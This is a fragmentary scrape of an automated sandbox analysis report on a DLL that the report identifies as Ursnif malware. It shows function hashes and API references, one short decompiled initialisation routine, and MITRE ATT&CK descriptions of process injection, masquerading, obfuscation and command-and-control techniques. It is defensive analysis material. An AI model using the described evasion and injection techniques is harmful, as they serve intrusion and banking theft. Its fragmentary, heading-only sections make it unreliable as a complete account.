Instruction Fuzzy Hash: D021A871E4031DEEDB10DFA0E944BAD7774AB06BD5F21062AE305960C0D7744198DB66

Uniqueness

Uniqueness Score: -1.00%

Function 02F55588, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02F4A680,02F54200,00000718), ref: 02F55709
VirtualProtectEx.KERNEL32(000000FF,?,0000301F,00000040,?), ref: 02F55771

Strings

G, xrefs: 02F55597
T, xrefs: 02F55590
@, xrefs: 02F5559D

Memory Dump Source

Source File: 00000008.00000002.481665992.0000000002F54000.00000040.00020000.sdmp, Offset: 02F54000, based on PE: false

Similarity

API ID: EnvironmentProtectVariableVirtual
String ID: @$G$T
API String ID: 3849859166-1505392691
Opcode ID: 3ed2f2be581f71e8f3aa605822d38379a08676f65a1d890f59194d43ab6da3c3
Instruction ID: 009dee69f41b638dc8b71cd3b954ff598a64ac72d61b7af7fe493e16bfc2496a
Opcode Fuzzy Hash: 3ed2f2be581f71e8f3aa605822d38379a08676f65a1d890f59194d43ab6da3c3
Instruction Fuzzy Hash: 39A14971D40338DBCB04CFACD850AAEFBB6BF88BD8F448959E605A7248D7349564CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02F17630, Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

std::_String_base::_Xlen.LIBCPMTD ref: 02F17643

Part of subcall function 02F18620: std::bad_exception::bad_exception.LIBCMTD ref: 02F18660
Part of subcall function 02F18620: __CxxThrowException@8.LIBCMTD ref: 02F1866E

std::_String_base::_Xlen.LIBCPMTD ref: 02F1766A
std::_String_base::_Xlen.LIBCPMTD ref: 02F17681
_memcpy_s.LIBCMTD ref: 02F176FA

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: String_base::_Xlenstd::_$Exception@8Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 649725542-0
Opcode ID: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction ID: d31411ab135fa21fa7326d12cac823999c40533611b172fd4e8bff234275aa7a
Opcode Fuzzy Hash: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction Fuzzy Hash: 8F3181327007058BD320EE5DD880A6BF7E5DFA03A5F90492EE69A87651D771EC448F90

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EE1F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x2ee41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x2ee41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x2ee41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x2ee41a8 = _t5;
					 *0x2ee41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x2ee41a4 = _t6;
					if(_t6 == 0) {
						 *0x2ee41a4 =  *0x2ee41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x02ee1f11
0x02ee1f1f
0x02ee1f27
0x02ee1f2c
0x02ee1f76
0x02ee1f76
0x02ee1f2e
0x02ee1f36
0x02ee1f72
0x02ee1f74
0x02ee1f38
0x02ee1f38
0x02ee1f3d
0x02ee1f4b
0x02ee1f50
0x02ee1f56
0x02ee1f5e
0x02ee1f63
0x02ee1f65
0x02ee1f65
0x02ee1f6f
0x02ee1f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02EE1C8E,74B063F0,00000000), ref: 02EE1F1F
GetVersion.KERNEL32 ref: 02EE1F2E
GetCurrentProcessId.KERNEL32 ref: 02EE1F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02EE1F56

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 4d28c58f6a4bcbbea6e812d0a5d8727703338df4510ac5adc51dd12679179cc8
Instruction ID: dbfdd8e4621f9b1d0507a687bd19f60781493c841e29e8609d2ce8a6076ada31
Opcode Fuzzy Hash: 4d28c58f6a4bcbbea6e812d0a5d8727703338df4510ac5adc51dd12679179cc8
Instruction Fuzzy Hash: 3BF06D71EC4300EFEF609F6BB8057653BA4BB04711F804859F115EE1C0E3B044E19B64

Uniqueness

Uniqueness Score: -1.00%

Function 02F205D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 02F20644
_ValidateRead.LIBCMTD ref: 02F20659

Strings

csm, xrefs: 02F205D9

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: ReadValidate__encode_pointer
String ID: csm
API String ID: 977738414-1018135373
Opcode ID: 100e39f9c686c23d4433da7459ff6b05a0c813332eb95c997bd47305e87e71a0
Instruction ID: c2191b37fc73e321cb54cb2d2b829eb5aad11213496f0e785a59bd4e7934d0e0
Opcode Fuzzy Hash: 100e39f9c686c23d4433da7459ff6b05a0c813332eb95c997bd47305e87e71a0
Instruction Fuzzy Hash: CF118E76A00228DFCB14CF64E45496A7B65AFA2388F50419CEA094F351CF31EA85CFD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 3d0.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Function 010E1144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 010E1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 010E1E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 010E1F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 010E1EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 010E1C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 011D6B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Function 010E1060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 010E1DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 010E13D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 010E18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 010E20CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 010E126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 010E14E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Function 011D5685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 010E1ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 010E1444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 011D2D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 011D4454, Relevance: 9.1, APIs: 6, Instructions: 102
memoryCOMMON

Function 011D513E, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Function 010E1F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 011D2206, Relevance: 2.7, APIs: 2, Instructions: 204
memoryCOMMONCrypto

Function 011D3109, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Function 010E2485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 011D8005, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON